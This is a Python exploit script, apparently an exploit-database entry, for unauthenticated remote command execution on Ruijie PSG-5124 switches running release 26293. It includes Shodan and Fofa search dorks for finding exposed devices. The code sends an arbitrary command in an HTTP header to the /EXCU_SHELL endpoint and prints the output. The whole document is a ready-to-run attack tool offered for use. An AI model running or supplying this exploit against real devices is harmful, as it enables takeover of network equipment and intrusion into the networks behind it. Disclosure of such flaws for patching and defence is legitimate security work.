| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 | #- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE) #- Shodan Dork: http.html_hash:-1402735717 #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif" #- Exploit Author: ByteHunter #- Email: 0xByteHunter@proton.me #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293) #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293) import http.client import argparse def send_request(ip, port, command): headers = { "Host": f"{ip}:{port}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cmdnum": "1", "Confirm1": "n", "Content-Length": "0", "Command1": command } try: connection = http.client.HTTPConnection(f"{ip}:{port}") connection.request("GET", "/EXCU_SHELL", headers=headers) response = connection.getresponse() print(f"Status Code: {response.status}") print(response.read().decode('utf-8')) connection.close() except Exception as e: print(f"Request failed: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE') parser.add_argument('--ip', help='Target IP address', required=True) parser.add_argument('--port', help='Port', required=True) parser.add_argument('--cmd', help='Command', required=True) args = parser.parse_args() ip = args.ip port = args.port command = args.cmd send_request(ip, port, command) |